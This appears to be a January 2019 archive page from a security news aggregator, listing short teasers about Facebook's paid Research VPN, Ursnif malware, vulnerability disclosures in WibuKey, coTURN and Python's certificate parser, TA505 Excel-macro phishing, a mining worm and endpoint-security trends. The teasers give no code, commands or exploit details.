Archive for January, 2019

Desperate for data on its competitors, Facebook  has been secretly paying people to install a “Facebook Research” VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August. Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms. Continue reading

Cisco Talos once again spotted the Ursnif malware in the wild. We tracked this information stealer after Cisco’s Advanced Malware Protection (AMP) Exploit Prevention engine alerted us to these Ursnif infections. Thanks to AMP, we were able to prevent Ursnif from infecting any of its targets. The alert piqued our curiosity, so we began to dig a bit deeper and provide some recent IoCs related to this threat, which traditionally attempts to steal users’ banking login credentials and other login information. Continue reading

Cisco Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual properties. It allows the users to manage software license via USB key. A third vulnerability is located in userland and can be triggered remotely, as it’s located in the network manager. Continue reading contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. Python can crash if getpeercert() is called on a TLS connection, which uses a certificate with invalid DistributionPoint in its extension. Continue reading

Executive summary

Today, Cisco Talos is disclosing three vulnerabilities in coTURN. coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called “DMZ” zones — any server reachable from the internet — to provide firewall traversal solutions. Continue reading

Last month, 360 Threat Intelligence Center captured multiple phishing emails sent by TA505 Group to target financial institutions. These phishing emails contain Excel attachments with Excel 4.0 Macro embedded and download Backdoor at last. This approach could bypass antivirus detections and we have published another report to explain it in detail: Continue reading

In December 2018, the 360 ​​Threat Intelligence Center captured multiple samples of attacks against banking institutions using Excel 4.0 macros. The phishing document is an Office Excel document carrying a malicious Excel 4.0 macro and is used to download and execute the final backdoor program. The use of Excel 4.0 macros is conducive to avoiding the detection of security software. We have done relevant detailed research on this, the relevant report can refer to: Evade-detection . Continue reading


Recently, the 360 ​​Threat Intelligence Center found that the mining worm that hijacked “Drive Life” was active again and made an early warning (for details, please refer to the article “ Hiking the “Driving the Life” mining worms again ”, in the analysis of the gang’s new activities 360 The Threat Intelligence Center found some phenomena related to the activities of the Mykings family, but failed to draw definitive conclusions. It was shared here for the reference of the industry, hoping to supplement the information of more dimensions to jointly judge. Continue reading

Imagine you had a house – three bedrooms, two stories, one bathroom on a single-family lot. And now imagine that you wanted to expand this property – you want four stories, multiple units, many bathrooms. What if we told you that you could build that dream house up in two weeks – without lifting a single brick? Continue reading

Meeting endpoint security challenges will take center stage for many enterprises in 2019 says Forrester Research in their latest endpoint research. The potency and diversity of attacker methods, an increased focus on user risk, and endpoint security professionals as data stewards are three top trends voiced by security decision makers. These concerns will likely influence endpoint security purchases. Continue reading